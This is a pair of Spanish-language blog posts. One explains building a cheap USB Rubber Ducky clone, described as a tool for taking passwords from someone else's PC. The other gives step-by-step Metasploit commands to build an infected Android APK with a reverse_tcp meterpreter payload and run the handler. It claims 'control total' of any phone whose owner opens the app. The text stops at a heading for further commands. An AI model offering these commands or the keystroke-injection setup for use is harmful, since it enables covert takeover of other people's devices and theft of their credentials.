domingo, 22 de enero de 2017

Como montar un USB Rubber Ducky por 3$

En este post aprenderemos como montar un USB Rubber Ducky por solo 3$, unos 5€ aquí en España. Ya que el Ducky en cuestión vale más de 50€ con gastos de envío y todo lo incluido, lo podréis ver aquí como ya sabéis, el USB Rubber Ducky es una herramienta que nos permite apropiarnos de las contraseñas de otro PC con solo conectarlo ya que el PC solo lo detectará como un teclado. 

 

Aquí os dejaré los componentes para poder montarlo:

-> Adurino Pro Micro
-> MicroSD Module
-> Adaptador para Android (en caso de necesitarlo)
-> Digispark

Aquí una guía que os lo explicará al detalle

->  https://www.youtube.com/watch?v=_yJWwKO3_Z0



Y por útimo el montaje

->  https://www.youtube.com/watch?v=fnplzZByaE4


En el próximo post os enseñaré como configurarlo para poder hackear Android o Windows. Sin nada más que decir, hasta la próxima.

*********************FUENTES**********************

http://seytonic.com/2016/12/03/links-to-buy-arduino-ducky-stuff/

jueves, 1 de diciembre de 2016

Hackeando Android con Metasploit

Como sabéis estos dáis eh estado tocando mucho Android y me propuse a ver si podía vulnerar la seguridad de mi propio teléfono y así corregir los errores en el terminal y lo hice de la siguiente forma


Primero cree una apk infectada con Mestasploit tal que así

msfvenom -p android/meterpreter/reverse_tcp LHOST="IP" LPORT=444 > Nombredelarchivo.apk
Después solo deberemos activar el servicio con el comando:

service postgresql start
Y ahora entrar a la consola de Metasploit con:
msfconsole

Ahora activaremos el Payload con
set PAYLOAD android/meterpreter/reverse_tcp

Y pondremos nuestra ip local previamente comprovada con ifconfig
set LHOST "IP"

Y el puerto
set LPORT 444

Ya solo quedará activar el exploit y en cuanto alguien abra la app infectada tendremos control total de su teléfono
exploit

Y con eso habreamos accedido al teléfono android y tendremos total control

Aquí dejaré una serie de comandos útiles para cuando estemos dentro del terminal

--> COMANDOS